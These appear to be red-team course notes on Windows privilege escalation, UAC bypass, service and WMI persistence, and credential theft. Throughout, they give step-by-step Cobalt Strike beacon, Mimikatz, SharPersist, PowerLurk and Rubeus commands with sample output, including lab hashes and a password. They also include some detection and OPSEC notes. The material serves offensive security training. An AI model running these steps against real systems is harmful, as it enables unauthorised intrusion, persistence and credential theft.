In keeping with the mantra of "principle of least privilege" – privilege escalation should only be sought after if it provides a means of reaching your goal, not something you do "just because". Exploiting a privilege escalation vulnerability provides defenders with additional data points to detect your presence. It's a risk vs reward calculation that you must make.

Common methods for privilege escalation include operating system or third-party software misconfigurations and missing patches. SharpUp can enumerate the host for any misconfiguration-based opportunities.

Windows Services Overview

• Windows services: Start automatically on boot, manage core functionality (e.g., Defender, Firewall, Update), or manage third-party apps.
• View services: Use services.msc or the command line (sc query) or PowerShell (Get-Service).
• Service Properties:
  • Binary Path: Location of the service executable (usually C:\Windows\system32 or C:\Program Files).
  • Startup Type: Determines when the service starts (Automatic, Manual, Disabled).
  • Service Status: Current state (Running, Stopped, StartPending, StopPending).
  • Log On As: The user account the service runs under (often privileged accounts like Local System or Domain Admins).
  • Dependents & Dependencies: Services that depend on or are required by the service.
• Security Risks:
  • Sensitive services (e.g., Windows Defender) have restricted permissions, while others may be exploitable.
  • If a service is misconfigured, it can be manipulated for privilege escalation (e.g., changing the executable or logon account).
• OPSEC:
  • Always restore service configurations after exploitation.
  • Avoid interrupting critical services, and seek permission before exploiting vulnerabilities.

Unquoted Service Path

• Unquoted service path: When the executable path in a service isn’t quoted (e.g., C:\Program Files\Vulnerable Services\Service 1.exe).
• Problem: Windows reads spaces as path terminators, leading to potential privilege escalation if an attacker can write a binary to the path.

Steps to Exploit:

1. Identify unquoted paths: Use wmic service get name, pathname or SharpUp to list services with unquoted paths.

   • Example: C:\Program Files\Vulnerable Services\Service 1.exe (unquoted).

2. Permissions check: Ensure you can write to the path (Get-Acl can show permissions).

   • Example: BUILTIN\Users can create files in the directory.

3. Payload upload: Upload a malicious payload to the unquoted path.

   • Use beacon commands to navigate, upload, and modify the service’s executable.

4. Stop and start service: Use sc stop and sc start to trigger execution of the malicious binary (works if you have the required permissions).

   • Example: sc stop VulnService1, sc start VulnService1.

5. Verify: Check if the payload is executed (via netstat or listening on a specific port).

   • Example: netstat -anp tcp.

6. Restore: To restore the service, delete the malicious file and restart the service.

OPSEC:

• Ensure proper permissions before modifying critical services.
• Always restore the service configuration after exploitation.

Modifiable Service Paths

• SharpUp Output: If SharpUp marks a service as "modifiable", it means we can change its configuration, like the binary path.
  • Example: VulnService2.

Steps to Exploit:

1. Check service rights: Use PowerShell to check service permissions (Get-ServiceAcl).

   • Example: Authenticated Users have ChangeConfig, Start, and Stop rights on VulnService2.

2. Check current binary path: Verify the service's current binary path (sc qc VulnService2).

   • Example: "C:\Program Files\Vulnerable Services\Service 2.exe" (quoted).

3. Upload malicious payload:

   • Example: Upload a payload to C:\Temp\, e.g., tcp-local_x64.svc.exe.

4. Change service binary path: Reconfigure the service to point to the malicious payload.

   • Command: sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe.

5. Stop and start service: To execute the malicious binary, stop and start the service.

   • Commands: sc stop VulnService2, sc start VulnService2.

6. Verify execution: Check if the malicious payload is executed (connect localhost 4444).

7. Restore original path: To restore the service, use sc config with the original binary path, ensuring it’s quoted correctly.

   • Command: sc config VulnService2 binPath= \""C:\Program Files\Vulnerable Services\Service 2.exe"\".

Modifiable Service Binary

• Vulnerable Service Binary Permissions:
  • The weak permissions are on the service binary itself (Service 3.exe), not on the service.

Steps to Exploit:

1. Check ACLs on Service Binary:

   • Use Get-Acl to inspect the file permissions.
     • Example: BUILTIN\Users have Modify privileges over Service 3.exe.

2. Download the current binary:

   • Command: download Service 3.exe.

3. Prepare Payload:

   • Copy and rename the payload to Service 3.exe.
     • Command: copy "tcp-local_x64.svc.exe" "Service 3.exe".

4. Upload the payload:

   • Try uploading the renamed payload.
   • Error: If the binary is in use (as the service is running), you’ll see ERROR_SHARING_VIOLATION (net helpmsg 32).

5. Stop the service:

   • Command: sc stop VulnService3.

6. Upload payload again:

   • After stopping the service, upload the payload (upload C:\Payloads\Service 3.exe).

7. Verify upload:

   • List files in the service directory to confirm the upload.

8. Start the service:

   • Command: sc start VulnService3.

9. Verify execution:

   • Use connect localhost 4444 to establish a link with the child beacon.

User Account Control (UAC) and Bypass

What is UAC?

• UAC (User Account Control) is a Windows feature that prompts users for consent when an application requests an administrative access token.
• Example: Bob is a local administrator on Workstation 2, but when attempting to add a new local user via net user hacker Passw0rd! /add, he receives an Access Denied error. This happens because the cmd.exe instance is running in "medium integrity."

Workaround (Running as Administrator):

1. Low Integrity: When running a standard Command Prompt, the integrity level is "medium".
   • Example: whoami /groups returns Mandatory Label\Medium Mandatory Level.
2. High Integrity: Right-clicking and selecting "Run as Administrator" elevates the Command Prompt to "high integrity".
   • Example: whoami /groups returns Mandatory Label\High Mandatory Level.

UAC Bypass:

• UAC Bypass: A technique used to elevate a medium integrity process to high integrity without the user's consent prompt.
• This is essential for attackers since "high integrity" is required for various post-exploitation tasks, such as dumping credentials.

Elevation with Beacon:

• Built-in UAC Bypass: Cobalt Strike's Beacon has several UAC bypass techniques, which are part of the Elevate Kit.

  • Example: Use the elevate uac-schtasks command to run a payload with high integrity.

  beacon> elevate uac-schtasks tcp-local [*] Tasked Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity context [+] established link to child beacon: 10.10.123.102

Elevated Host Persistance

Creating a Persistent Service for Privilege Escalation

Why Create a New Service?

• Exploiting existing Windows services for privilege escalation typically impacts the legitimate service.
• Instead, creating a new service ensures persistence without disrupting existing services.

Steps to Create a Persistent Service:

1. Upload the Payload: First, upload the payload to the target machine.

   beacon> cd C:\Windows beacon> upload C:\Payloads\tcp-local_x64.svc.exe beacon> mv tcp-local_x64.svc.exe legit-svc.exe

2. Use SharPersist for Service Creation: Use the SharPersist tool to add a new service for persistence.

   beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

   Output:

   [*] INFO: Adding service persistence [*] INFO: Command: C:\Windows\legit-svc.exe [*] INFO: Command Args: [*] INFO: Service Name: legit-svc [+] SUCCESS: Service persistence added

3. Service Characteristics:

   • The new service will be created in a STOPPED state.
   • The START_TYPE will be set to AUTO_START, meaning it won’t run until the machine reboots.
   • Once the machine is rebooted, the service will automatically start and wait for a connection.

Persistence via WMI Events

Key WMI Classes:

• EventConsumer: The action to be performed (e.g., executing a payload).
• EventFilter: The trigger for the action (e.g., process start, user login, etc.).
• FilterToConsumerBinding: Links an EventConsumer with an EventFilter.

Using PowerLurk for WMI Persistence:

PowerLurk is a PowerShell tool used to create malicious WMI event subscriptions.

Steps:

1. Upload the Payload:

   • Upload the DNS payload to the Windows directory.

   beacon> cd C:\Windows beacon> upload C:\Payloads\dns_x64.exe

2. Import PowerLurk and Create WMI Event:

   • Import PowerLurk and create a new WMI event that executes the payload when notepad.exe starts.

   beacon> powershell-import C:\Tools\PowerLurk.ps1 beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

3. View the WMI Event:

   • Check the event with the following PowerShell command:

   Get-WmiEvent -Name WmiBackdoor

   • The EventConsumer will have a CommandLineTemplate set to "C:\Windows\dns_x64.exe".
   • The EventFilter will query for SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

4. Trigger the Payload:

   • Open notepad.exe on the target machine, and the DNS beacon will be triggered.

5. Remove the WMI Event:

   • To remove the backdoor, use:

   Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

Credential Theft

Mimikatz in Cobalt Strike (Beacon)

Differences in Behavior:

• Temporary Process: Each time Mimikatz is run in Beacon, it executes in a temporary process which is destroyed afterward. This means commands like:

  beacon> mimikatz token::elevate beacon> mimikatz lsadump::sam

  won't work because they rely on the same process.

• Chaining Commands (CS 4.8): Since Cobalt Strike 4.8, you can chain multiple Mimikatz commands using a semi-colon (;).

  beacon> mimikatz token::elevate ; lsadump::sam

Beacon Command Modifiers:

• !: Elevates Beacon to SYSTEM before running the command. Useful when running as a high-integrity process but needing SYSTEM impersonation.

  beacon> mimikatz !lsadump::sam

• @: Impersonates Beacon's thread token before running the command. This is useful for interacting with remote systems (e.g., dcsync). Compatible with make_token and steal_token.

  beacon> make_token DEV\nlamb F3rrari beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt

Example Mimikatz Output:

• Elevated Token: You can impersonate the DEV\bfarmer user or SYSTEM.

• SAM Dump: Mimikatz can dump the SAM database, revealing user hashes like the Administrator account.

  SAM Username : Administrator Hash NTLM: fc525c9683e8fe067095ba2ddc971889 lm: 91b6e660bcac036ae7ab67a3d383bc82 ntlm: fc525c9683e8fe067095ba2ddc971889

DCSync Example:

• dcsync Command: Using mimikatz @lsadump::dcsync, you can synchronize the krbtgt account's credentials from a domain controller.

  Credentials: Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d ntlm: 9fb924c244ad44e934c390dc17e02c3d lm: 207d5e08551c51892309c0cf652c353b

Mimikatz sekurlsa::logonpasswords Module

Overview:

• The sekurlsa::logonpasswords module is well-known for dumping plaintext passwords from memory.
• NTLM hashes can still be retrieved, which are useful for Pass the Hash attacks or for cracking passwords.

Mitigations:

• In Windows 10 and above, Microsoft has implemented several mitigations like disabling wdigest by default, reducing the likelihood of obtaining plaintext passwords directly from memory.

Command Example:

• To run this module, elevated privileges are required.

  beacon> mimikatz !sekurlsa::logonpasswords

• Output Example: Mimikatz will display the NTLM hash and other credentials for users:

  Authentication Id : 0 ; 579458 (00000000:0008d782) User Name : jking Domain : DEV NTLM : 59fc0f884922b4ce376051134c71e22c SHA1 : 74fa9854d529092b92e0d9ebef7ce3d065027f45

• Short-hand Command: Cobalt Strike provides a shortcut for this:

  beacon> mimikatz logonpasswords

  After running the command, you can view the credentials via the View > Credentials menu.

OPSEC Considerations:

• Event Logging: Running this module will open a read handle to LSASS, which can be logged under event 4656.

• Kibana Search: Use the "Suspicious Handle to LSASS" saved search in Kibana to detect such actions.

  • Example output shows a handle to LSASS being opened by powershell.exe with specific access flags:

  Access mask: 0x1010 Flags: PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_READ (0x0010)

Mimikatz sekurlsa::ekeys Module

Overview:

• The sekurlsa::ekeys module dumps Kerberos encryption keys for currently logged-on users.
• Kerberos is commonly used by modern Windows services, making it more effective for blending into legitimate authentication traffic than NTLM hashes.
• These keys are useful for various Kerberos abuse scenarios.

Command Example:

• Elevated privileges are required to run this module:

  beacon> mimikatz !sekurlsa::ekeys

• Output Example:

  Authentication Id : 0 ; 459935 (00000000:0007049f) User Name : jking Domain : DEV Key List : aes256_hmac 4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 rc4_hmac_nt 59fc0f884922b4ce376051134c71e22c

• In case Mimikatz incorrectly labels the hashes as des_cbc_md4, the AES256 key is the one to use.

Credential Management:

• These hashes do not automatically populate in the Credential model.
• You can manually add them via the View > Credentials > Add menu in Cobalt Strike.

OPSEC Considerations:

• Running this module also opens a read handle to LSASS, which could be logged under event 4656 (similar to sekurlsa::logonpasswords).

Mimikatz lsadump::sam Module

Overview:

• The Security Account Manager (SAM) database holds NTLM hashes for local accounts.
• These can be extracted using the lsadump::sam module in Mimikatz.
• If a common local administrator account with the same password is used across an entire environment, it can be easy to move laterally across systems.

Command Example:

• Elevated privileges are required to run this module:

  beacon> mimikatz !lsadump::sam

• Output Example:

  Domain : WKSTN-2 SysKey : b9dc7de8b1972237bbbd7f82d970f79a User : Administrator Hash NTLM: fc525c9683e8fe067095ba2ddc971889 lm - 0: 91b6e660bcac036ae7ab67a3d383bc82 ntlm- 0: fc525c9683e8fe067095ba2ddc971889

OPSEC Considerations:

• This module opens a handle to the SAM registry hive.
• You can use the "Suspicious SAM Hive Handle" saved search in Kibana to detect such activity.

Domain Cached Credentials (DCC)

• Purpose: DCC allows domain credentials to be cached locally for situations where a machine is disconnected from the domain, like on a roaming laptop. This enables local authentication, even without domain connectivity.

• Cracking DCC:

  • Unlike NTLM, the hash format used for DCC cannot be employed in pass-the-hash attacks. The only viable method for using these hashes is to crack them offline.

• Mimikatz Command:

  • The lsadump::cache module extracts these credentials from the registry (HKLM\SECURITY).

  • Command:

    beacon> mimikatz !lsadump::cache

• Output: Shows information on cached domain credentials for specific users, along with their associated hashes (MsCacheV2).

  • Example Output:

    [NL$1 - 9/1/2022 8:10:06 AM] RID : 00000450 (1104) User : DEV\bfarmer MsCacheV2 : 98e6eec9c0ce004078a48d4fd03f2419

• Cracking Process:

  • Hashes need to be transformed to the format $DCC2$<iterations>#<username>#<hash>.
  • Tools like hashcat can then be used to crack them.

• OPSEC Considerations:

  • This module opens a handle to the SECURITY registry hive, which can be detected under event 4656.
  • Use the "Suspicious SECURITY Hive Handle" saved search in Kibana to monitor for this.

Rubeus: Kerberos Ticket Interaction and Triage

• Purpose: Rubeus is a C# tool for interacting with Kerberos, leveraging legitimate Windows APIs. It’s useful for dumping and interacting with Kerberos tickets, which can be a valuable attack vector in Active Directory environments.

Triage Command

• Purpose: The triage command lists all the Kerberos tickets in your current logon session and, if elevated, from all logon sessions on the machine.

  Command:

  beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

• Output: Shows Kerberos tickets for different users, including Ticket Granting Tickets (TGTs) and Ticket Granting Service Tickets (TGSs).

  Example Output:

  | LUID | UserName | Service | EndTime | ----------------------------------------------------------------------------------------------------------------- | 0x14bf5e | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 6:10:14 PM | | 0x7049f | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 9/1/2022 5:29:20 PM |

Dump Command

• Purpose: The dump command extracts Kerberos tickets from memory. It uses Windows APIs, so it doesn’t require opening suspicious handles to LSASS. If not elevated, it can only pull tickets from the current session.

  Command:

  beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt

• Output: Shows Kerberos ticket details, including the ticket for the specified service (e.g., krbtgt/DEV.CYBERBOTIC.IO) in base64 encoding.

  Example Output:

  ServiceName : krbtgt/DEV.CYBERBOTIC.IO UserName : jking Base64(key) : EIkrCAL8wx98PVRBOZGDKC6Y0KReSosWtvXyv6rIefI= Base64EncodedTicket : doIFuj [...snip...] lDLklP

• Optional: The /nowrap option formats the base64 ticket on a single line, making it easier to copy and paste.

DCSync Technique and OPSEC Considerations

DCSync Overview

• Protocol: The Directory Replication Service (MS-DRSR) protocol is responsible for synchronizing and replicating Active Directory data across domain controllers.

• Technique: DCSync is a technique that exploits this protocol to extract username and credential data (e.g., NTLM hashes, Kerberos keys) from a Domain Controller (DC).

  Permissions Required:

  • The GetNCChanges permission is typically available only to domain admins.
  • The technique is useful for credential dumping and will be important later for Kerberos and NTLM exploitation.

Beacon Command for DCSync

• Beacon provides a dedicated dcsync command, which internally calls the mimikatz lsadump::dcsync method to extract credentials from a Domain Controller.

  Example Command:

  beacon> make_token DEV\nlamb F3rrari beacon> dcsync dev.cyberbotic.io DEV\krbtgt

  Command Breakdown:

  • DEV\nlamb: Using a user (lamb) from the DEV domain.
  • dcsync dev.cyberbotic.io DEV\krbtgt: Extracts credentials for the krbtgt account from the dev.cyberbotic.io domain using the DC dc-2.dev.cyberbotic.io.

  Output Example:

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
  ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
  lm  - 0: 207d5e08551c51892309c0cf652c353b
  Primary: Kerberos-Newer-Keys
  Default Salt : DEV.CYBERBOTIC.IOkrbtgt
  AES Keys:
    aes256_hmac (4096): 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
    aes128_hmac (4096): 6fb62ed56c7de778ca5e4fe6da6d3aca
    des_cbc_md5 (4096): 629189372a372fda